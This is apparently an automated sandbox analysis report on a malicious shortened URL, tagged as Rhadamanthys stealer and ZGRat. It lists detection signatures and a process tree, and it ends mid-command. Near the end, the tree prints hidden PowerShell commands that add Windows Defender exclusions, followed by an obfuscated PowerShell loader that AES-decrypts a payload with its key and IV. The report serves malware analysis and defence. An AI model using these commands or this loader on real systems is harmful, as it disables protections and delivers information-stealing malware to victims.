rhadamanthys | hxxps://goo[.]su/nbyqnYl

Resubmissions

16/04/2024, 17:00

240416-vh45vaha6y 1

16/04/2024, 16:59

240416-vhhxlsfd58 10

16/04/2024, 16:43

240416-t79k7agf9y 10

Analysis

max time kernel
89s
max time network
87s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16/04/2024, 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://goo.su/nbyqnYl

Score

10^/10

rhadamanthys zgrat rat stealer

Malware Config

Signatures

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral1/memory/4440-1343-0x000000000A0F0000-0x000000000A146000-memory.dmp	family_zgrat_v1

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4440 created 3024	4440	powershell.exe	50

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/4440-1343-0x000000000A0F0000-0x000000000A146000-memory.dmp	net_reactor

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3212	4440	WerFault.exe	117
2876	4440	WerFault.exe	117

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4620	schtasks.exe
1644	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	205	Go-http-client/1.1
HTTP User-Agent header	206	Go-http-client/1.1

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133577594104894600"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1900	chrome.exe
1900	chrome.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
2728	powershell.exe
2728	powershell.exe
2728	powershell.exe
2728	powershell.exe
4440	powershell.exe
4440	powershell.exe
4496	dialer.exe
4496	dialer.exe
4496	dialer.exe
4496	dialer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: 33	1752	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1752	AUDIODG.EXE
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe
Token: SeShutdownPrivilege	1900	chrome.exe
Token: SeCreatePagefilePrivilege	1900	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe
1900	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 2640	1900	chrome.exe	74
PID 1900 wrote to memory of 2640	1900	chrome.exe	74
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 2880	1900	chrome.exe	76
PID 1900 wrote to memory of 4592	1900	chrome.exe	77
PID 1900 wrote to memory of 4592	1900	chrome.exe	77
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78
PID 1900 wrote to memory of 1328	1900	chrome.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:3024
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://goo.su/nbyqnYl
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc87b29758,0x7ffc87b29768,0x7ffc87b29778
  2⤵
  PID:2640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:2
  2⤵
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:4592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2088 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2916 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2920 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4360 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1464 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4708 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5368 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5556 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=6140 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6652 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:4904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5976 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:2192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4704 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4744 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5948 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6796 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6000 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=7148 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6896 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6908 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:8
  2⤵
  PID:3640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=1636 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=7096 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=2344 --field-trial-handle=1664,i,6184040666431376476,12623150184163576425,131072 /prefetch:1
  2⤵
  PID:1644

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3644

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1e4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2588

C:\Users\Admin\Desktop\Loader.exe
"C:\Users\Admin\Desktop\Loader.exe"
1⤵
PID:3336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\Microsoft\\\""
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\driver2.cmd
  2⤵
  PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd
    3⤵
    PID:4384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$OtRn='CrHqHLeaHqHLtHqHLeDeHqHLcrHqHLypHqHLtHqHLorHqHL'.Replace('HqHL', ''),'TraemUMnsemUMfemUMoemUMremUMmFemUMiemUMnaemUMlemUMBlemUMocemUMkemUM'.Replace('emUM', ''),'GetdtMnCdtMnudtMnrrdtMnedtMnntdtMnProdtMncesdtMnsdtMn'.Replace('dtMn', ''),'LoaEkqSdEkqS'.Replace('EkqS', ''),'CoYBArpyYBArToYBAr'.Replace('YBAr', ''),'DeWFvScoWFvSmWFvSprWFvSessWFvS'.Replace('WFvS', ''),'InNPzivNPzioNPzikeNPzi'.Replace('NPzi', ''),'EnmOcXtrmOcXyPomOcXintmOcX'.Replace('mOcX', ''),'MawKnOinMwKnOodwKnOulwKnOewKnO'.Replace('wKnO', ''),'SDjtIpliDjtItDjtI'.Replace('DjtI', ''),'ElHxDPemHxDPentHxDPAtHxDP'.Replace('HxDP', ''),'RehrooahroodLhrooinhrooeshroo'.Replace('hroo', ''),'FfdhTrofdhTmBfdhTasfdhTe64fdhTStfdhTrifdhTngfdhT'.Replace('fdhT', ''),'ChSbbtanSbbtgSbbteExSbbttSbbtenSbbtsiSbbtoSbbtnSbbt'.Replace('Sbbt', '');powershell -w hidden;function IpDBZ($zdbNH){$hHYmF=[System.Security.Cryptography.Aes]::Create();$hHYmF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHYmF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHYmF.Key=[System.Convert]::($OtRn[12])('Csmx7EI2yjujgbDhnof51XZIbhx0Ab8yxshKqh+1TFw=');$hHYmF.IV=[System.Convert]::($OtRn[12])('W4wKO7GtfBJL9VPlL12wmQ==');$LmbRq=$hHYmF.($OtRn[0])();$AwlKe=$LmbRq.($OtRn[1])($zdbNH,0,$zdbNH.Length);$LmbRq.Dispose();$hHYmF.Dispose();$AwlKe;}function TnoCD($zdbNH){$MSMky=New-Object System.IO.MemoryStream(,$zdbNH);$wbEyv=New-Object System.IO.MemoryStream;$qvVev=New-Object 